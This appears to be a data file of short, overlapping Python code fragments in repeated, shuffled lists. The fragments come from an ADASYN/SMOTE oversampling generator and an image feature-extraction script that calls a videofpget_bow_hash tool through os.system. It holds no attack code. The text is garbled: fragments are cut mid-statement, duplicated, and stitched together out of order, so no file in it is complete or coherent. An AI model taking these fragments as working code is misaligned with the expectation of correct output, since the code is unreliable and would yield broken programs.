make_classification(n_samples =", "= min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn,", "plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df", "train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X =", "than the number of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]),", "parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy =", "n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy = parss, k_neighbors = parknn, random_state =", "self.X_ = X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if", "# ada_gen = Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) #", "Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self,", "required sample size is smaller than the number of observations in train\") parss", "= parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn *", "parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2", "import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_", "self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ =", "1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST # # from", "0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot as plt", "is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try: Xnew,", "2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:]", "# n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state =", "numpy as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu", "except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray:", "# import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn()", "import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def", "self.mname_ = \"adasyns\" else: self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self):", "= \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def", "make_classification # X, y = make_classification(n_samples = 100, n_features = 2, n_informative =", "None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return", "while type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]:", "= 100, n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated", "self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self", "warnings.warn(\"The required sample size is smaller than the number of observations in train\")", "X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] >", "= make_classification(n_samples = 100, n_features = 2, n_informative = 2, # n_redundant =", "> n_samples: warnings.warn(\"The required sample size is smaller than the number of observations", "y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn", "n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated = 0,", "# TODO Inspect while type(Xnew) is not np.ndarray and parknn <= n_samples and", "type(Xnew) is not np.ndarray and parknn <= n_samples and parknn <= self.X_.shape[0]: try:", "Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO", "the number of observations in train\") parss = 'all' y = np.ones(self.X_.shape[0]), np.zeros(n_samples)", "Gen_adasyn: def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None,", "# plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) # df =", "2, # n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state", "from sklearn.datasets import make_classification # X, y = make_classification(n_samples = 100, n_features =", "warnings from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_", "def my_name(self): return self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets", "not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y", "__init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_", "0, n_repeated = 0, n_classes = 1, # random_state = 0) # import", "imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y = SMOTE(sampling_strategy =", "if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size is smaller than the number", "fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1): parss", "0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen =", "= 2, # n_redundant = 0, n_repeated = 0, n_classes = 1, #", "\"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # #", "self.mname_ # ============================================================================= # # TEST # # from sklearn.datasets import make_classification #", "n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and parknn <=", "is not np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew,", "def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required", "= np.ones(self.X_.shape[0]), np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew", "np.zeros(n_samples) y = np.concatenate(y) X = np.concatenate((self.X_, Gen_randu().fit(self.X_).sample(n_samples = n_samples))) Xnew = None", "np.ndarray: from imblearn.over_sampling import SMOTE parknn = min(5, n_samples, self.X_.shape[0]) Xnew, y =", "<= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state", "= 0, n_repeated = 0, n_classes = 1, # random_state = 0) #", "2, n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes =", "= None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None): self.X_ = X.copy()", "= 0, n_classes = 1, # random_state = 0) # import matplotlib.pyplot as", "n_samples=1): parss = 'not majority' if self.X_.shape[0] > n_samples: warnings.warn(\"The required sample size", "parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn =", "np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class Gen_adasyn:", "random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if", "2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn * 2 if type(Xnew) is", "100, n_features = 2, n_informative = 2, # n_redundant = 0, n_repeated =", "parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors = parknn,", "= None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is", "self.mname_ = \"adasyn\" return Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # =============================================================================", "n_samples: warnings.warn(\"The required sample size is smaller than the number of observations in", "RuntimeError): parknn = parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling", "import numpy as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import", "n_redundant = 0, n_repeated = 0, n_classes = 1, # random_state = 0)", "* 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn =", "n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss, n_neighbors", "as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X) #", "from src.generators.rand import Gen_randu class Gen_adasyn: def __init__(self): self.X_ = None self.mname_ =", "k_neighbors = parknn, random_state = 2020).fit_resample(X, y) self.mname_ = \"adasyns\" else: self.mname_ =", "= parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn", "parknn = parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import", "Xnew[y == 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST #", "== 1,:][0:n_samples,:] def my_name(self): return self.mname_ # ============================================================================= # # TEST # #", "= 0) # import matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen", "matplotlib.pyplot as plt # plt.scatter(X[:,0], X[:,1]) # # ada_gen = Gen_adasyn() # ada_gen.fit(X)", "n_samples))) Xnew = None parknn = min(5, n_samples, self.X_.shape[0]) # TODO Inspect while", "# X, y = make_classification(n_samples = 100, n_features = 2, n_informative = 2,", "n_informative = 2, # n_redundant = 0, n_repeated = 0, n_classes = 1,", "as np from imblearn.over_sampling import ADASYN import warnings from src.generators.rand import Gen_randu class", "parknn * 2 if type(Xnew) is not np.ndarray: from imblearn.over_sampling import SMOTE parknn", "<= n_samples and parknn <= self.X_.shape[0]: try: Xnew, y = ADASYN(sampling_strategy = parss,", "n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except (ValueError, RuntimeError): parknn = parknn", "def __init__(self): self.X_ = None self.mname_ = \"adasyn\" def fit(self, X, y=None, metamodel=None):", "= Gen_adasyn() # ada_gen.fit(X) # df = ada_gen.sample(n_samples = 201) # plt.scatter(df[:,0], df[:,1])", "import make_classification # X, y = make_classification(n_samples = 100, n_features = 2, n_informative", "= X.copy() return self def sample(self, n_samples=1): parss = 'not majority' if self.X_.shape[0]", "def fit(self, X, y=None, metamodel=None): self.X_ = X.copy() return self def sample(self, n_samples=1):", "min(5, n_samples, self.X_.shape[0]) # TODO Inspect while type(Xnew) is not np.ndarray and parknn", "y = ADASYN(sampling_strategy = parss, n_neighbors = parknn, random_state = 2020).fit_resample(X, y) except" ]
[ "True: j = random.randint(0 , 119) if i != j: break while True:", "119) while True: j = random.randint(0 , 119) if i != j: break", "m != l: break return i , j , z , k ,", "random.randint(0 , 119) if z != i and z != j: break k", "= random.randint(0 , 119) if z != i and z != j: break", "i and z != j: break k = random.randint(0 ,2) while True: l", "random.randint(0 , 119) if i != j: break while True: z = random.randint(0", "initializer(): i = random.randint(0 , 119) while True: j = random.randint(0 , 119)", ", 119) while True: j = random.randint(0 , 119) if i != j:", "if l != k: break while True: m = random.randint(0 , 2) if", "!= l: break return i , j , z , k , l", "import random def initializer(): i = random.randint(0 , 119) while True: j =", "def initializer(): i = random.randint(0 , 119) while True: j = random.randint(0 ,", ",2) while True: l = random.randint(0 , 2) if l != k: break", "l != k: break while True: m = random.randint(0 , 2) if m", "True: m = random.randint(0 , 2) if m != k and m !=", "k and m != l: break return i , j , z ,", ", 119) if z != i and z != j: break k =", "= random.randint(0 , 2) if m != k and m != l: break", "while True: l = random.randint(0 , 2) if l != k: break while", "i = random.randint(0 , 119) while True: j = random.randint(0 , 119) if", "= random.randint(0 , 119) while True: j = random.randint(0 , 119) if i", "break while True: z = random.randint(0 , 119) if z != i and", "random.randint(0 ,2) while True: l = random.randint(0 , 2) if l != k:", "<gh_stars>1-10 import random def initializer(): i = random.randint(0 , 119) while True: j", "break return i , j , z , k , l , m", "2) if l != k: break while True: m = random.randint(0 , 2)", "break k = random.randint(0 ,2) while True: l = random.randint(0 , 2) if", ", 2) if m != k and m != l: break return i", "k = random.randint(0 ,2) while True: l = random.randint(0 , 2) if l", "and z != j: break k = random.randint(0 ,2) while True: l =", "!= j: break k = random.randint(0 ,2) while True: l = random.randint(0 ,", "random.randint(0 , 2) if m != k and m != l: break return", "l = random.randint(0 , 2) if l != k: break while True: m", "l: break return i , j , z , k , l ,", "random.randint(0 , 119) while True: j = random.randint(0 , 119) if i !=", ", 119) if i != j: break while True: z = random.randint(0 ,", "= random.randint(0 , 119) if i != j: break while True: z =", "if i != j: break while True: z = random.randint(0 , 119) if", "119) if z != i and z != j: break k = random.randint(0", "True: l = random.randint(0 , 2) if l != k: break while True:", "!= k and m != l: break return i , j , z", "while True: z = random.randint(0 , 119) if z != i and z", "and m != l: break return i , j , z , k", ", 2) if l != k: break while True: m = random.randint(0 ,", "z = random.randint(0 , 119) if z != i and z != j:", "break while True: m = random.randint(0 , 2) if m != k and", "if m != k and m != l: break return i , j", "!= i and z != j: break k = random.randint(0 ,2) while True:", "= random.randint(0 , 2) if l != k: break while True: m =", "j: break k = random.randint(0 ,2) while True: l = random.randint(0 , 2)", "!= k: break while True: m = random.randint(0 , 2) if m !=", "z != j: break k = random.randint(0 ,2) while True: l = random.randint(0", "while True: m = random.randint(0 , 2) if m != k and m", "i != j: break while True: z = random.randint(0 , 119) if z", "random def initializer(): i = random.randint(0 , 119) while True: j = random.randint(0", "= random.randint(0 ,2) while True: l = random.randint(0 , 2) if l !=", "while True: j = random.randint(0 , 119) if i != j: break while", "if z != i and z != j: break k = random.randint(0 ,2)", "m != k and m != l: break return i , j ,", "j: break while True: z = random.randint(0 , 119) if z != i", "!= j: break while True: z = random.randint(0 , 119) if z !=", "m = random.randint(0 , 2) if m != k and m != l:", "k: break while True: m = random.randint(0 , 2) if m != k", "2) if m != k and m != l: break return i ,", "119) if i != j: break while True: z = random.randint(0 , 119)", "j = random.randint(0 , 119) if i != j: break while True: z", "z != i and z != j: break k = random.randint(0 ,2) while", "random.randint(0 , 2) if l != k: break while True: m = random.randint(0", "True: z = random.randint(0 , 119) if z != i and z !=" ]
[ "-1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd =", "\"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith", "= [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname =", "copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash", "get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file =", "open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split('", "feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path in enumerate(dir_child_list):", "names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name) newname", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow '", "+ ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] +", "= get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time =", "+ os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) +", "/opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction", "\"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i,", "[] for dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix):", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def", "start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir):", "+ '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[", "\" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash'", "dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return", "- start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print \"--------------------------------------------------\" def", "' + img_path + '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith /", "in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name,", "feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return:", "= '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len( img_names)) +", "print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir:", "import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f", "item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile", "as name_file: name_file.writelines(names) print \"extracting feature from image No. %d , %d dirs", "img_path + '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin '", "print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin", "/ :return: ''' copyFiles('./test_2000.txt', target_dir) feature_generator_sift_color(dir_img=os.path.abspath(os.path.join(os.path.dirname(target_dir), '../'))) if __name__ == \"__main__\": query_dir_imgs =", "exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print", "'_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image No. %d ,", "= [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in", "/retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \"", "[] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp:", "'/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names = get_all_files_suffix(img_path) print", "list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img", "with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append(", "os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! attation!\" return -1", "in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def", "get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for name", "feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print \"--------------------------------------------------\"", "print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' +", "time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\" print", "image No. %d , %d dirs in total\" % ((i + 1), len(dir_child_list))", "f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if", "extraction ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt", "for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir):", "in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in", "-1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w')", "name_file.writelines(names) print \"extracting feature from image No. %d , %d dirs in total\"", "os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not os.path.exists(eachfile): print \"src path not", "print \" feature extraction starts\" print \"--------------------------------------------------\" start_time = time.time() for i, img_path", "for j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j", "extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature extraction ends ...\"", "dirpath, dirnames, filenames in os.walk(path): for name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name))", "name in filenames: if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs", "enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname", "import shutil import time def get_dirs_child(path): return [os.path.join(path, f) for f in os.listdir(path)]", "= os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names", "newname = os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\")", "targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines() for", "'r') as f: list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs',", "def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\" print \" feature extraction starts\" print", "if name.endswith(file_suffix): all_file.append(os.path.join(dirpath, name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with", "os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/'", "1), len(dir_child_list)) end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print", "1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img) print \"--------------------------------------------------\"", "'/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1]", "attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile + \" copy succeeded!\"", "+ img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print \"extracting feature from image", "list_imgs_tmp = f.readlines() for item_img in list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not", "= time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \"", "item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs: if not", "in list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print", "+ str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/'", "' + os.path.dirname( img_path) + '/' + img_path.split('/')[-1] + '.bow ' + os.path.dirname(img_path)", "list_imgs: if not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!!", "eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir + os.path.basename(eachfile)) print eachfile +", "''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息 :param target_dir: endswith / :return: '''", "[os.path.join(path, f) for f in os.listdir(path)] def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for", "print \"src path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile,", "list_imgs_tmp: list_imgs.append( item_img.split(' ')[0].replace('/opt/Datasets/Datasets/ccweb_video/dataset_ccweb/trans_imgs', '/Data/Datasets/ccweb_video/dataset_ccweb/trans_imgs').strip()) if not os.path.exists(targetDir): os.makedirs(targetDir) for eachfile in list_imgs:", "def get_all_files_suffix(path, file_suffix='.jpg'): all_file = [] for dirpath, dirnames, filenames in os.walk(path): for", "path not exist:\" + eachfile print \"error!! attation!\" return -1 shutil.copy(eachfile, targetDir +", "/opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list =", "+ os.path.basename(eachfile)) print eachfile + \" copy succeeded!\" cmd = '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1", "j, item_name in enumerate(img_names): names.append(item_name) newname = os.path.dirname(item_name) + '/%05d' % (j +", "'/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/dongsl/t.bow /opt/dongsl/t.hash' def feature_generator_sift_color(dir_img): dir_child_list = get_dirs_child(dir_img)", "+ img_path + '/ 1 ' + str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin", "end_time = time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print", "not os.path.exists(eachfile): print \"src path not exist:\" + eachfile print \"error!! attation!\" return", "img_path in enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in", "start_time = time.time() for i, img_path in enumerate(dir_child_list): names = [] img_names =", "def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp =", "copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as f: list_imgs_tmp = f.readlines()", "enumerate(dir_child_list): names = [] img_names = get_all_files_suffix(img_path) for j, item_name in enumerate(img_names): names.append(item_name)", "= '/usr/local/bin/videofpget_bow_hash /opt/dongsl/keyframe/10732a0e6a0edef9dcbb2155236e46a7ed5047c0/ 1 4 /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin /opt/a.bow /opt/dongsl/a.hash' '/usr/local/bin/videofpget_bow_hash /opt/dongsl/trans_imgs/add_text 1 26069", "len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 ' + str(len(", "# coding=utf-8 import os import shutil import time def get_dirs_child(path): return [os.path.join(path, f)", "'/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1]", "' + os.path.dirname(img_path) + '/' + img_path.split('/')[ -1] + '.hash' os.system(fp_pick) with open(os.path.dirname(img_path)", "name)) return all_file def copyFiles(file_imgs, targetDir): list_imgs = [] with open(file_imgs, 'r') as", "get_all_files_suffix(img_path) print len(img_names) fp_pick = '/usr/local/bin/videofpget_bow_hash ' + img_path + '/ 1 '", "with open(os.path.dirname(img_path) + '/' + img_path.split('/')[-1] + '_img_names.txt', 'w') as name_file: name_file.writelines(names) print", "time.time() print (\"final_feature extract time:\", (end_time - start_time)) print \"--------------------------------------------------\" print \" feature", "ends ...\" print \"--------------------------------------------------\" def feature_generator_query(target_dir): ''' 根据图片文件列表,获取线上系统 查询视频帧 .bow .hash .txt 信息", "os.path.dirname(item_name) + '/%05d' % (j + 1) os.rename(item_name, newname + \".jpg\") img_names =", "str(len( img_names)) + ' /retrieval/VideoDNA/VideoRetrival/bins/centers128_32sift.bin /retrieval/VideoDNA/VideoRetrival/bins/ITQ_32_dim800.bin ' + os.path.dirname( img_path) + '/' +", 